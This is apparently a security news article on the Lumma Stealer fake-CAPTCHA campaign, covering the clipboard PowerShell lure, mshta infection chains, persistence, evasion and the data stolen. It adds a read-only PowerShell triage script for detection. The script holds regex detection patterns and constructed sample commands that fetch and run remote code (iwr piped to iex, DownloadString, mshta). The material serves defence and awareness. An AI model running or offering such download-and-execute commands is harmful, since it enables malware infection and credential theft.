Lumma Stealer Exploits Fake CAPTCHA Pages to Harvest Sensitive Data
A sophisticated malware campaign is utilizing fake CAPTCHA verification pages to distribute Lumma Stealer, an advanced information-stealing malware that has gained significant traction in underground markets since its 2022 debut.
As of March 2025, this malware-as-a-service (MaaS) operation maintains over a thousand active subscribers, with subscription prices starting at $250.
The Fake CAPTCHA Attack
Kaspersky reports that the attack vector leverages users’ familiarity with common verification systems like Google reCAPTCHA and Cloudflare CAPTCHA.
Victims typically encounter these fake verification pages through two primary channels: cloned pirated media websites with injected malicious advertisements, and fraudulent Telegram channels masquerading as cryptocurrency or pirated content communities.
When users visit these deceptive pages, they’re presented with what appears to be a standard CAPTCHA verification interface containing an “I’m not a robot” or “Verify” button.
The trick fires when the user clicks that button: the page's script covertly copies a malicious PowerShell command to the clipboard.
The deception is effective because the page then instructs the victim to perform an apparently innocuous sequence: open the Run dialog with Win+R, press Ctrl+V, then press Enter.
Those three keystrokes paste and run the clipboard contents, so the command is executed by the user in their own session rather than by the browser, and browser sandboxing offers no protection.
Victims unintentionally execute a command that downloads a Base64-encoded PowerShell script, which in turn initiates the Lumma Stealer infection chain.
Technical Infection Process
The infection process employs several techniques to evade detection. Upon execution, the malware downloads a ZIP archive, typically into the user's %AppData% directory (which already resolves to C:\Users\<user>\AppData\Roaming), extracts its contents to a hidden folder, and establishes persistence by creating a value under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
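Both the Win+R step in the lure and the Run-key persistence leave registry traces a responder can check. The following is an added example, not Kaspersky's tooling and not the malware's code: a read-only PowerShell triage that decodes -EncodedCommand payloads, scores command lines against download-and-execute indicators chosen by the editor, and applies the same rules to the Win+R history (RunMRU) and the HKCU Run key. The sample commands and the example.invalid URLs are constructed for the demonstration and are not indicators from the campaign.

```powershell
# Added example (not Kaspersky's tooling, not the malware's code): read-only triage for the
# ClickFix pattern. Indicator regexes are the editor's; sample commands below are constructed and
# use the reserved example.invalid TLD, so nothing here is a real IOC.
# Artifacts checked: RunMRU (Win+R history - the lure needs the victim to press Enter in the Run
# dialog, and Explorer records every command confirmed there until the key is cleared) and the
# per-user Run key the article names as Lumma's persistence location.

$EncodedArg   = '(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})'
$Lolbins      = '\b(?:powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)(?:\.exe)?\b'
$DownloadExec = '\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer|frombase64string)\b|(?:mshta|curl|certutil)[^|]*https?://'
$HiddenFlags  = '-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile|-noni\b|-(?:ep|executionpolicy)\s+bypass'

function Get-DecodedCommand {
    # -EncodedCommand (and its prefixes -e/-ec/-enc) carries Base64 of a UTF-16LE script.
    param([string]$CommandLine)
    if (-not ($CommandLine -match $EncodedArg)) { return $null }
    try   { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
    catch { return $null }   # not valid Base64; the other indicators still apply
}

function Test-ClickFixCommand {
    # Emits one string per indicator that fires; no output means nothing fired.
    param([string]$CommandLine)
    $hits = @()
    if ($CommandLine -match $Lolbins)      { $hits += "launches $($Matches[0])" }
    if ($CommandLine -match $HiddenFlags)  { $hits += "hides window / bypasses policy: $($Matches[0])" }
    if ($CommandLine -match $DownloadExec) { $hits += "download-and-execute primitive: $($Matches[0])" }
    $decoded = Get-DecodedCommand $CommandLine
    if ($decoded) {
        $hits += "uses -EncodedCommand; decodes to: $($decoded.Substring(0, [Math]::Min(70, $decoded.Length)))"
        # Encoding is only an obfuscation layer, so score the decoded script with the same rules.
        foreach ($inner in @(Test-ClickFixCommand $decoded)) { $hits += "  inside payload: $inner" }
    }
    $hits
}

function Get-RunMruCommands {
    # Values a..z hold "command\1"; MRUList orders the slot letters most-recent first.
    $key = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    foreach ($slot in ([string]$props.MRUList).ToCharArray()) {
        $p = $props.PSObject.Properties["$slot"]
        if ($p) { ([string]$p.Value) -replace '\\1$', '' }
    }
}

function Get-RunKeyEntries {
    $key = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    if (-not (Test-Path $key)) { return }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$') {
            [pscustomobject]@{ Name = $p.Name; Command = [string]$p.Value }
        }
    }
}

function Test-RunEntry {
    # Autorun-specific checks on top of the command-line rules: AppData target, hidden folder.
    param([string]$Command)
    $hits = @(Test-ClickFixCommand $Command)
    if ($Command -match '%(?:local)?appdata%|\\AppData\\(?:Roaming|Local)\\') { $hits += 'target is under the user AppData tree' }
    $exe = [Environment]::ExpandEnvironmentVariables($(if ($Command -match '^\s*"([^"]+)"') { $Matches[1] } else { ($Command.Trim() -split '\s+')[0] }))
    $dir = $null
    if ($exe) { try { $dir = Split-Path -Path $exe -Parent -ErrorAction Stop } catch { } }
    if ($dir -and (Test-Path -LiteralPath $dir)) {
        $attrs = (Get-Item -LiteralPath $dir -Force).Attributes
        if (($attrs -band [IO.FileAttributes]::Hidden) -ne 0) { $hits += "target folder is hidden: $dir" }
    }
    $hits
}

# --- constructed samples (made up for this example) ---------------------------------------
$encodedBody = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/verify.txt")'))
$constructed = @(
    'powershell -w hidden -nop -c "iwr https://example.invalid/c.txt | iex"',
    "powershell -enc $encodedBody",
    'mshta https://example.invalid/verify.mp4',   # "media file" URL that really serves HTA/JS
    'notepad'
)
foreach ($cmd in $constructed) {
    $hits = @(Test-ClickFixCommand $cmd)
    '{0,-10} {1}' -f $(if ($hits.Count) { 'SUSPICIOUS' } else { 'ok' }), $cmd
    $hits | ForEach-Object { "           - $_" }
}

# --- live host, read-only -----------------------------------------------------------------
"`n== Win+R history (RunMRU) =="
foreach ($cmd in @(Get-RunMruCommands)) {
    $hits = @(Test-ClickFixCommand $cmd)
    if ($hits.Count) { "SUSPICIOUS  $cmd"; $hits | ForEach-Object { "  - $_" } }
}
"`n== HKCU Run persistence =="
foreach ($e in @(Get-RunKeyEntries)) {
    $hits = @(Test-RunEntry $e.Command)
    if ($hits.Count) { "SUSPICIOUS  [$($e.Name)] $($e.Command)"; $hits | ForEach-Object { "  - $_" } }
}
```

Run it in the context of the user who was lured; RunMRU and the Run key are both per-user hives, so an admin session on the same box will not see the victim's entries. Any PowerShell or mshta command in RunMRU is worth a look on an end-user workstation regardless of what the indicators say, since ordinary users rarely type such commands into the Run dialog, and the key can be wiped by the malware or the user, so an empty key is not a clean bill of health.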
In more complex scenarios, the malware deploys a multi-layered approach utilizing JavaScript code hidden in seemingly innocent media files.
The infection chain includes obfuscated code executed through Microsoft’s HTML Application engine (mshta.exe), which ultimately downloads and executes the Lumma payload.
Lumma employs two primary loading techniques to evade security solutions:
- DLL sideloading – placing a malicious DLL where a trusted, often signed, application will load it in place of a legitimate library.
- Injection of malicious code into the overlay of legitimate executables (the data appended after the last PE section, which the loader does not map into memory).
The malware also performs anti-analysis checks, scanning for security products like Avast, AVG, McAfee, and Bitdefender before deploying its payload.
Data Exfiltration Capabilities
Once installed, Lumma Stealer targets an extensive range of sensitive information:
- Cryptocurrency wallet credentials and browser extensions (including MetaMask).
- Two-factor authentication (2FA) data.
- Browser-stored credentials and cookies.
- Remote access tool credentials (e.g., AnyDesk).
- Password manager data (including KeePass).
- Financial information such as credit card numbers.
The stolen data is transmitted to command and control (C2) servers through encrypted HTTP POST requests to domains like reinforcenh[.]shop and stogeneratmns[.]shop.
Security experts recommend heightened vigilance when encountering CAPTCHA verification pages, particularly on sites offering pirated content or cryptocurrency services.
Users should never execute commands from their clipboard without understanding what they do, particularly when prompted by an unexpected verification process; no legitimate CAPTCHA asks the user to open the Run dialog or paste anything.
Organizations should implement robust endpoint protection and user awareness training to mitigate this increasingly prevalent threat. Even corporate environments have fallen victim to Lumma Stealer infections, which can serve as entry points for more destructive attacks such as ransomware.
The post Lumma Stealer Exploits Fake CAPTCHA Pages to Harvest Sensitive Data appeared first on Cyber Security News.